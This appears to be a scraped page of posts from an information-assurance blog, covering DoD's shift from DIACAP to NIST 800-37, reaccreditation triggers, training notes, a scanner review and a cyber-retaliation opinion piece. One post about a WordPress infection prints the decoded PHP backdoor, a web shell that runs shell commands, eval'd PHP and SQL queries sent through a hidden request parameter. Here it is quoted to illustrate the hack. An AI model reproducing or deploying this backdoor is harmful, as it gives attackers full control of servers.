NIST 800: DoD Risk Management Framework

There are a couple defense policy reflecting the DoD’s move to NIST 800 standards: Defense Acquisition Regulation Supplement (DFARS 2011-D039) & CJCSI 6510.01, Information Assurance and Support to Computer Network Defense

Defense Acquisition Regulation Supplement (DFARS 2011-D039)
Defense contractors will have to meet the NIST Special Publication 800-53 security controls. Most large defense contractor have already started meeting defense controls for DIACAP (which are very similar to NIST 800 controls).
more info @ firegovernment IT

CJCSI 6510.01, Information Assurance and Support to Computer Network Defense
The new 6510.01F replaces the old 6510.01E. The document refers to changes in the name of the Information Assurance Manager (IAM) to Information System Security Manager (ISSM) and the Information Assurance Officer (IAO) to Information System Security Officer (ISSO). The name Designated Accreditation Authority (DAA) is changed to Authorizing Official (AO). The former DIACAP term “certification” is changed to 800-37 term “assessment”.

Updates titles for Designated Accrediting Authority (DAA) to Authorizing Official; Information Assurance Manager (lAM) to Information Systems Security Manager (ISSM); and Information Assurance Officer (IAO) to Information Systems Security Officer (ISSO) to align with CNSSI No. 4009 (reference e) terms. Replaces term certification with assessment and accreditation with authorization (to operate) in alignment with CNSSI No. 4009 (reference e) terminology. The new terms are followed by legacy terms in parentheses throughout instruction.

The document also refers to the coming changes to DoD 8500 policies. The changes will focus on NIST 800:

Select security controls lAW DODI 8500.2 (reference g). Note: The next update to DODI 8500.2 (reference g) and DODI 8510.01 (reference i) will direct DOD IS categorization and security control selection lAW CNSSI No. 1253, “Security Categorization and Control Selection for National Security Systems” (reference ill) with additional specific guidance on the DIACAP Knowledge Service. DODI 8500.2 (reference g) and DODI 8510.01 (reference i) will also direct the use of security controls in NIST SP 800-53, “Recommended Security Controls for Federal Information Systems and Organizations” (reference kkk) with supporting validation procedures in NIST SP 800-53A, “Guide for Assessing the Security Controls in Federal Information Systems and Organizations” (reference 111), and additional DOD guidance published in the DIACAP Knowledge Service.

The ultimate goal will be to move away from “Certification & Accreditation” and to a Risk Management Framework” as in NIST SP 800-37:

NIST 800-37 SP, “Guide for Applying the Risk Management Framework to Federal Information Systems” (reference mmmmm), provides guidelines for applying the Risk Management Framework to include conducting the activities of security categorization, security control selection and implementation, security control assessment, information system authorization, and security control monitoring.

When does a DoD Information System require a re-accreditation

How do you determine when a DoD Information System should have a full re-accreditation?

We are not talking about the obvious:
-3 year expiration
-completely new version and/or overhaul of a system

We are talking about a single client on within an Information System getting an upgraded operating systems, or a firewall being upgraded or the addition of 4 Cisco internetworking devices and a VLAN change.

How do we know what is a basic sustaiment change, a configuration management changed (approved by the Configuration Board members) or a full blown 100,000 dollar re-accreditation.

You would think there was some kind of matrix that could match up modifications to a DoD IS with what actions must be performed. If there is one, I have not seen it.

All we have is high level regs that tell us IA Workforce peons (who must deal with details, schedules and limited funds) almost nothing we don’t already know.

Assessing the IA Impact & Maintaining Situational Awareness:
DoD 8500.2, Information Assurance gives us IA Controls such as
DCII-1, dealing with IA Impact Assessment. Its states, “Changes to the DoD information system are assessed for IA and accreditation impact prior to implementation.” The DoD instruction also tells us the we are supposed conduct comprehensive annual reviews of our systems process, procedures and IA Control status.

How are we supposed to monitor “Changes to the DoD information system?

We know that we are supposed monitor all DoD IS’s to keep track of the baseline. And according to the regs, we are supposed to do this by a configuration management process (DCPR-1, CM Process). That configuration management process is supposed to have a “configuration control board that implements procedures to ensure a security review and approval of all proposed DoD information system changes, to include interconnections to other DoD information systems.”

So Configuration Management gives us oversight on changes to DoD IS but who within the CM process determines whether changes to a system should have a re-accreditation?
IA Control DCCB-2, Control Board tells us that” all information systems are under the control of a chartered Configuration Control Board that meets regularly according to DCPR-1.” Is also tells us that the Information Assurance Manager (IAM) is a member of the CCB.

From my interpretation of these high level statements, the IAM is the subject matter expert who has a lot of say so on the IA impact of modifications to a given DoD IS.


I did not find anything for that in 8500.2 so I moved on to CJCSI 6510.01, but it only says the same things that 8500.2 says (Configuration Management, CCB, having a baseline). But it did say this:

“Ensure a configuration management (CM) process is implemented and establish appropriate levels of configuration management to maintain the accredited security posture. The security impact of each change or modification to an information system or site configuration will be assessed against the security requirements and the accreditation conditions issued by the DAA..”

Still pretty high level, but we are getting closer since the instruction is telling us: “ impact of each change or modification to an information system or site configuration will be assessed against the security requirements and the accreditation conditions issued by the DAA“.

I thought that the only way to get more insight is to look at the lower level regulations within specific branches. Air Force’s Certification & Accreditation Program, 33-210, for example talks specifically about reaccreditation. It states, Information system owner (ISO) “Alerts AFNetOps of any changes to the topology or software affecting the security posture of the enclave boundaries so that the gateway package can be reaccredited if necessary. (” And in table 3.2. it states “PM/SM/ISO will enter information in EITDR, host an initial stakeholder meeting, and initial security review to determine if a new version is to be created.” It mentions different reaccreditation actions for Networked and Standalone systems. Its goes on say that “if changes will not affect the security posture of the IS, the PM/SM/ISO will annotate the outcome of the meeting and make necessary edits to the C&A package.”

The Army’s AR 25-2, Information Assurance regulation, has an entire section on Accrediation & Reaccreditation (5-5), but offers still no specifics. The Army does have AR 380-19, AIS Information System Security and it is pretty specific (see excerpt below).. but it is now OBSOLETE and replaced by AR 25-5.

All regulation and instructions are inline as far as the need to reaccredit if there is an IA IMPACT, but no specifics on what constitues an “IA Impact”. 8510, DIACAP mentions that the IA posture of an IS must remain acceptable, in order to retain its Authorization to Operate (ATO). If I were the IAM for a day.. I would hang my hat of this important statement.

We have to work with what we have!!
Based on what we have:
Changes in a DoD IS’s IA Controls determine whether or not a system will need a reaccrediation. There is no specifics on what can force a reaccrediation. So we must conclude that there is no “magic bullet” that will instantly create the need for a reaccreditation. In other words, no modifications to a certain hardware or software or certain subsystems or even the changes to network architecture will be the reason for reaccreditation every single time.

Significant changes to IA Controls are the only thing we can really put our finger on.

So lets say that IA Control, DCCS-2, Configuration Specification was changed on an Information System. This IA Control deals with making sure the all IA Enabled and IA Products have the DISA Security Technical Implementation Guides (or equivalent) applied. Maybe an example will help us understand the process of determining reaccreditation: A DoD Information System Owner requests the addition of four new storage devices to the system enclave. Lets say, that these storage devices will have an adverse affect on the security posture of the overall system because they are not in compliance with DCAS-2, Acquisition Standards… so the storage devices have not gone through NSA/Common Criteria. Additionally the storage devices will not be compliant with DCCS which means they will not have security in accordance with DISA/NSA checklists and guidance.

Prior to being implemented or even tested the request for this change should go through the configuration management process where the IAM will tell the Program Manager and System Owner (or is representative) the security impact to the over all system. He or she would have to explain to them that the change may affect the current ATO, because they will now be non-compliant on two (possibly more controls) that were previously compliant. The IAM would also be wise to get in contact with other subject matter experts such as the system administrator and/or IAO would be in charge of implementing and testing the system. The IAM might also contact the Certifying Authority (or representative) to determine if such a change would create the need for a reaccreditation.

One thing the IAM does NOT want to do is simply sign the Program Managers and System Owners up for some changes to the system that would jeapordise the Authorization to Operate. The IAM should do their homework and present the real risk of the modifications to the system owner. CYA is paramount.

Once the IAM determine the impact, and the modification are made:
According to DoD 8500.2, 5.8.5. “ensure that IA-related events or configuration changes that may impact accreditation are reported to affected parties, such as Information Owners and DAAs of interconnected DoD information systems.”

Some older regulations are more specific. AR 380-19, AIS System Security for example:
3-6. Reaccreditation

a. All AIS, except those designated as nonsensitive, will be formally reaccredited within 3 months after any of the following occurs:

(1) Addition or replacement of a mainframe or significant part of a major system.

(2) A change in sensitivity designation (para 2-2a).

(3) A change in security mode of operation (para 2-2b).

(4) A significant change to the operating system or executive software.

(5) A breach of security, violation of system integrity, or unusual situation that appears to invalidate the accreditation.

(6) A significant change to the physical structure housing the AIS that affects the physical security described in the accreditation.

(7) Three years has elapsed since the effective date of the existing accreditation.

b. Reaccreditation will include the same steps accomplished for the original accreditation; however, those portions of the documentation that are still valid need not be redone.

AR 380-19 has been replaced with AR 25-5 which is pretty high level.

UPDATED IA STUFF + Procrastination

My greatest skill is procrastination. I really am the best, most skilled procrastinator I know. It takes all of my will power to stay consistent with anything, including this blog, which is why (among other things) I am not banking like Darren Rowse or Steve Pav, two of my favorite bloggers.

YOU SEE, I am such a good procrastinator that I JUST procrastinated on getting to the REAL subject of this article, security, IA updates.

A fellow IA Analyst wrote me with questions that got right to the heart of IA… change.

She asked about AFI 33-202.
And I said:

Right as I felt I had mastered the contents of 33-202, the airforce moved to 33-210 (to replace all its C&A stuff). I believe 33-202 is now obsolete and replaced with 33-200 & 33-202 and others.. last time I was with the AF, anyway.

What about IT LEAN?
I said:

As for IT Lean, you can find that on AF Knowledge Now site and I think they have links to it on EITDR. If you are interested in IT Lean you’ll be REALLY interested in 33-210:

But if you are working with the Air Force and want more on the IT LEAN process you should be digging into AFCAP, Air Force Certification & Accreditation Program, an AF version of IT Lean.

CNSS 1253:
A lot of people also ask me to send them a copy of the CNSSI 12-53. But it is actually OUT. Its the CNSSI 1253. I, personally, have not had any clear direction (currently NO direction) on how to start moving some of the CNSSI to the systems I work on. I suspect that the Govt. will start this within the next couple of years and start phasing out DIACAP.. but who the hell knows what a bureaucracy of their size will do next!

Lastly, my fellow IA Analyst asked me about EITDR
and I said:

You’ll find the EITDR POCs on the Air Force Portal or Knowledge Now. Log on to the Air Force Portal (if you don’t have an account get one.. you may have to get sponsor by the Govt to get it). Once on the AF Portal search for EITDR and they’ll have tons of stuff on it. Waaaaay more stuff than you want to read. You’ll also find the person you need to start the EITDR process with.

Server at Magic Requires Username Password

The WordPress “Magic” hack!

If your getting this message: “The server (our server domain, e.g. DOMAIN.COM) at Magic” Then you likely have infected code in your wordpress blog.

Wordpress Magic Attack

Wordpress Magic Attack

Wordpress user Yokima reported this very slick hack.

And the fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information in that “serve at Magic” message box. Although updating the the wordpress blog definitely fixes the issue, you may have to reload your pluggins too because they may also have some infect code. Doing further research on this matter.

*Similar issues reported by techartistserver at Fuzz Access requires a username and password.”

What the infected code looks like after the malware injection into your blog.. yep.. uuugly!

From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:


if (!function_exists('______safeshell'))


function ______safeshell($komut) {



$disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));

if (!empty ($komut)) {

if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {

//@ ob_start();

@ passthru($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();


elseif (function_exists('system') && !in_array('system', $disable_functions)) {

//@ ob_start();

@ system($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();


elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {

$res = @ shell_exec($komut);

echo $res;


elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {

@ exec($komut, $res);

$res = join("\n", $res);

echo $res, "\n";


elseif (@ is_resource($f = @ popen($komut, "r"))) {

//$res = "";

while (!@ feof($f)) {

//$res .= @ fread($f, 1024);

echo(@ fread($f, 1024));


@ pclose($f);




$res = {$komut};

echo $res;





if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {

echo "\n";

if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {

eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);


else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {

______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);


else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {

$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);

if (!$result)


echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";



else if (is_resource($result))


$res = array();

while ($row = mysql_fetch_assoc($result))


$res[] = $row;



echo serialize($res);





echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";




echo "\n\n";




p.s: don’t feel too bad, even the security masters get hacked by malicious S.O.B’s.

GFI LANGuard – Review

GFI Languard Network and Security Scanner

I was given the honor of reviewing GFI LANguard network and security scanner. Right off the bat I notice that the interface is very intuitive & easy to use, which is important to a busy security professional that have better things to do with their time than fight with a messy
security tool.

The network scanning tool I normally use is called Retina.
When lining the two up, I have to say Retina is much more powerful, with many more options built in. It can drill way down and do intrusive scans where GFI LANguard v.9 is pretty vanilla. It gives you what you need and that is it.

The simplicity could be an advantage to a system admin doing a security job, because it really is straight to the point. The cost is definitely and advantage. GFI LANguard is about ½ the cost of the Retina Scan tool.

Retina Professional Edition 16 IP Pack – $995.00

GFI LAN Guard goes for about 300+ for 10 licences.

Nessus is considered one of the best network scan tools but its more expensive then both.

What I really like about Retina is that it allows you to scan in accordance with Department of Defense standards, SAN, and others. Languard does look at the SANS Top 20 report vulnerabilities.

If your looking for basic, down to Earth network & security scanner for your small to medium business needs, than GFI Languard is definitely the way to go because you will not beat the cost for the quality and support you get. Its going to give you a thorough assessment of the your systems and even tell you how to fix them. Buy this product!

DIACAP Essentials + IA Control Validation Training (part 4): DIACAP/AFCAP Day 4 & 5

UPDAT: 2014 – Risk Management Framework for DOD IT released.

Days 4 & 5 bring the DIACAP/AFCAP Essentials Class to a close. The
biggest things I learned were: CNSSI 4009 is the the official glossary of DOD IA, there is a big difference between theory, policy and practice, Agents of the Certifying Authority (ACA) are official validators and there is a difference between acquisition Mission criticality and IA MAC levels.

Stuff I learned from people in the class:

-AFCA is changing its name (to what?)

DOD is going to put the new IA controls in NCSSI 12-53 (currently in draft)

-a lot of what I need in there is in NIST 800-53

Marines use something called Exacta

Site called

33-202 is now completely irrelevant and obsolete (not even mentioned ONCE in the class)


Feds call Certification &Accreditation (C&A) “Security authorization”

NIST SP 800-37

Day 4:

Validator Activities & Issue Accreditation Decision

Prepare POA&M

Validate Results/Scorecard


Make certification determination

CA/DAA Package review

Day 5:

Validation procedures were discussed. On day five, we looked at how the validators look at a system.

I thought is was interesting. It should help me get through the EITDR/DIACAP process easier.

Maintain Situational Awareness

Maintain IA Posture

Conduct Review


Retire system

DIACAP Essentials + IA Control Validation Training (part 4): DIACAP/AFCAP Day3

UPDAT: 2014 – Risk Management Framework for DOD IT released.

Day 3 heats up a little. We start talking about what it take to actually get validated. The DIACAP Implementers Guide & the DIACAP Validators guide is opened up and reviewed. I think we all learned a little something during this discussion because there have been some challenges with this. Unfortunately, we don’t to far into the validator stuff.

Day 3:

DIACAP Structure

Terminology Review

Assemble DIACAP Team

Registered System/System Information Profile

Assign IA Controls

Initiate DIACAP Implementation Plan

DIACAP Essentials + IA Control Validation Training (part 2): DIACAP/AFCAP Day1

This is the second installment of the DIACAP Essentials journal.

In the first day of class we’ve taken a high level look at the big picture of the Department of Defense Information Assurance Certification & Accreditation Process (DIACAP) and Air Force Certification & Accreditation Program (AFCAP). It is a very valuable tool for a beginner.

Since I’ve gone through the entire process (with a legacy system) more than once through all the growing pains of Air Force C&A from DITSCAP to DIACAP, I found that I knew about 90% of everything taught. I don’t mind having a refresher, though and quite frankly, I need the CPE’s for my CISSP :).

There were a couple of golden nuggets that I’ve been able to get out of some of the old timers. I learned some interesting things about how the Navy, Marines and Army do things.
Navy (as weird as their dumb ass rank system.. yep, I said it.. its dumb) have like three systems: DITPR-DON, DA-DUMB and some other BS, Marines have something called Exacta and the Army has APMS (Army Profile Management System). Also learned cool off topic stuff like history of eMass.

I must admit I’m looking forward to day two.
pros of day 1: Good solid start on basics GREAT for beginners. SecureInfo gets mad props for have a great instructor John M.(don’t know if he wants his full name published.. but he’s highly, highly knowledgeable and very positive).

cons of day 1: Right off the bat I am noticing a huge hole in the training… a lack of in depth teaching of EITDR, which is how the Air Force implements, manages and maintains the entire DIACAP/AFCAP process. I don’t really see how you can teach one without the other these days. I guess contractually, SecureInfo can not touch it since some other company has the contract. But unfortunately, the folks that are new to this are going to suffer. Because if they goto this class without knowing the EITDR they will know why but now how, and if they go to the EITDR class without knowing the DIACAP they will know how but not Why.

DIACAP Essentials + IA Control Validation Training (part 1)

UPDAT: 2014 – Risk Management Framework for DOD IT released.

I’ve been scheduled to go to DIACAP Essentials + IA Control Validation training. It is the same training that is given to validators at AFCA, so I guess it is pretty serious stuff. I was very reluctant to go until I realized that I actually really need the CPE’s to maintain my CISSP.

Since I’ve been doing the DIACAP stuff for about 2 years now, I’m not certain there is any new information for me to learn.

DIACAP Essentials
The Department of Defense Information Assurance Certification and
Accreditation Process (DIACAP) Essentials course blends lecture and hands-on
exercises to introduce students to DIACAP policy (to include FISMA
requirements of a comprehensive, repeatable, and auditable Information
Security process).

IA Control Validation In-Depth – 3 Days
The IA Control Validation In-Depth course takes the students DIACAP
education and turns the view from an implementor to a Validator perspective
and involves the students in the validation process for the IA Controls
(DoDI 8500.2).

What I am hoping to get from the course is a better handle on the FISMA process.
I don’t feel like I really have a handle on what is supposed to happen with it.

You Hack US, We Nuke You!

The United States’ top commanding officer for the space and cyber domains told reporters last week that a cyber attack could merit a more conventional military response.

During a press briefing on Thursday, U.S. Air Force General Kevin Chilton, who heads the U.S. Strategic Command, told reporters that top Pentagon advisors would not rule out a physical attack on any force that attacks the United States through the Internet. Currently, the military’s networks are probed thousands of times a day, but the goal of attackers seems to be espionage, not to take down critical networks, he told reporters –

Security Focus

I don’t believe that military force is the equivalent action for a cyber attack. Arrest and/or apprehension is the physical response necessary for criminal hackers attacking from other countries. Cyber counter-attacks are the correct response for government funded & coordinated attacks.

I think if the U.S. reciprocates a cyber attack x10 when other countries are playing little games, we’d get our message across effectively. We should do so in a well funded and covert way in which the enemy has NO DOUBT that the face slap came from a U.S, hand, but no proof at all allowing plausible deniability. It should be black Ops hacks, very well coordinated, very well funded and full time.

I don’t think the US can be complacent or wrecklessly meek in matters of cyber warfare. Instead, it must be fair, quiet and heavy handed when it comes to one of its most valuable asset, information.

1 2 3